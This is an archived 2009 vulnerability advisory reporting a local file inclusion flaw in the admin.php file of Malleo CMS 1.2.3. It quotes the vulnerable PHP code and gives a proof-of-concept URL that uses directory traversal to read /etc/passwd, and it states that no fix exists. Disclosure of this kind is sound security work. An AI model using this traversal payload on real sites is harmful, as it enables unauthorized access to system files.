AOH :: HP Unsorted M :: VA3220.HTM

Malleo 1.2.3 Local File Inclusion Vulnerability



Malleo 1.2.3 Local File Inclusion Vulnerability
Malleo 1.2.3 Local File Inclusion Vulnerability



--001636c5ad0d9bcb110467c4350b
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 7bit

*******   Salvatore "drosophila" Fresta   *******

[+] Application: Malleo
[+] Version: 1.2.3
[+] Website: http://www.malleo-cms.com 

[+] Bugs: [A] Local File Inclusion

[+] Exploitation: Remote
[+] Date: 17 Apr 2009

[+] Discovered by: Salvatore "drosophila" Fresta
[+] Author: Salvatore "drosophila" Fresta
[+] Contact: e-mail: drosophilaxxx@gmail.com 


*************************************************

[+] Menu

1) Bugs
2) Code
3) Fix


*************************************************

[+] Bugs


- [A] Local File Inclusion

[-] Risk: low
[-] File affected: admin.php

This bug allows a privileged user to include local
files. I decided to publish this bug for reporting
security flaw only. The following is the vulnerable
code:

...

$module =  (isset($_GET['module']))?
$_GET['module']:$cf->config['default_module_admin'];

...

}else{
	// Mise a jour de la date d'activite de la session fondateur
	if ($cf->config['activer_digicode']) $_SESSION['digicode_TTL'] = time();
	if (file_exists($root.$module))
	{
		include_once($root.$module);
		
...


*************************************************

[+] Code


- [A] Local File Inclusion

http://www.site.com/path/admin.php?module=../../../../../etc/passwd 


*************************************************

[+] Fix

No fix.


*************************************************

-- 
Salvatore "drosophila" Fresta
CWNP444351

--001636c5ad0d9bcb110467c4350b
Content-Type: text/plain; charset=US-ASCII; 
	name="Malleo 1.2.3 Local File Inclusion-17042009.txt"
Content-Disposition: attachment; 
	filename="Malleo 1.2.3 Local File Inclusion-17042009.txt"
Content-Transfer-Encoding: base64
X-Attachment-Id: f_ftn7ejof0

KioqKioqKiAgIFNhbHZhdG9yZSAiZHJvc29waGlsYSIgRnJlc3RhICAgKioqKioqKgoKWytdIEFw
cGxpY2F0aW9uOiBNYWxsZW8KWytdIFZlcnNpb246IDEuMi4zClsrXSBXZWJzaXRlOiBodHRwOi8v
d3d3Lm1hbGxlby1jbXMuY29tCgpbK10gQnVnczogW0FdIExvY2FsIEZpbGUgSW5jbHVzaW9uCgpb
K10gRXhwbG9pdGF0aW9uOiBSZW1vdGUKWytdIERhdGU6IDE3IEFwciAyMDA5CgpbK10gRGlzY292
ZXJlZCBieTogU2FsdmF0b3JlICJkcm9zb3BoaWxhIiBGcmVzdGEKWytdIEF1dGhvcjogU2FsdmF0
b3JlICJkcm9zb3BoaWxhIiBGcmVzdGEKWytdIENvbnRhY3Q6IGUtbWFpbDogZHJvc29waGlsYXh4
eEBnbWFpbC5jb20KCgoqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioq
KioqKioqCgpbK10gTWVudQoKMSkgQnVncwoyKSBDb2RlCjMpIEZpeAoKCioqKioqKioqKioqKioq
KioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioKClsrXSBCdWdzCgoKLSBbQV0gTG9j
YWwgRmlsZSBJbmNsdXNpb24KClstXSBSaXNrOiBsb3cKWy1dIEZpbGUgYWZmZWN0ZWQ6IGFkbWlu
LnBocAoKVGhpcyBidWcgYWxsb3dzIGEgcHJpdmlsZWdlZCB1c2VyIHRvIGluY2x1ZGUgbG9jYWwK
ZmlsZXMuIEkgZGVjaWRlZCB0byBwdWJsaXNoIHRoaXMgYnVnIGZvciByZXBvcnRpbmcgCnNlY3Vy
aXR5IGZsYXcgb25seS4gVGhlIGZvbGxvd2luZyBpcyB0aGUgdnVsbmVyYWJsZSAKY29kZToKCi4u
LgoKJG1vZHVsZSA9ICAoaXNzZXQoJF9HRVRbJ21vZHVsZSddKSk/ICRfR0VUWydtb2R1bGUnXTok
Y2YtPmNvbmZpZ1snZGVmYXVsdF9tb2R1bGVfYWRtaW4nXTsKCi4uLgoKfWVsc2V7DQoJLy8gTWlz
ZSBhIGpvdXIgZGUgbGEgZGF0ZSBkJ2FjdGl2aXRlIGRlIGxhIHNlc3Npb24gZm9uZGF0ZXVyDQoJ
aWYgKCRjZi0+Y29uZmlnWydhY3RpdmVyX2RpZ2ljb2RlJ10pICRfU0VTU0lPTlsnZGlnaWNvZGVf
VFRMJ10gPSB0aW1lKCk7DQoJaWYgKGZpbGVfZXhpc3RzKCRyb290LiRtb2R1bGUpKQ0KCXsNCgkJ
aW5jbHVkZV9vbmNlKCRyb290LiRtb2R1bGUpOwoJCQouLi4KCgoqKioqKioqKioqKioqKioqKioq
KioqKioqKioqKioqKioqKioqKioqKioqKioqKioqCgpbK10gQ29kZQoKCi0gW0FdIExvY2FsIEZp
bGUgSW5jbHVzaW9uCgpodHRwOi8vd3d3LnNpdGUuY29tL3BhdGgvYWRtaW4ucGhwP21vZHVsZT0u
Li8uLi8uLi8uLi8uLi9ldGMvcGFzc3dkCgoKKioqKioqKioqKioqKioqKioqKioqKioqKioqKioq
KioqKioqKioqKioqKioqKioqKgoKWytdIEZpeAoKTm8gZml4LgoKCioqKioqKioqKioqKioqKioq
KioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKio--001636c5ad0d9bcb110467c4350b--

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.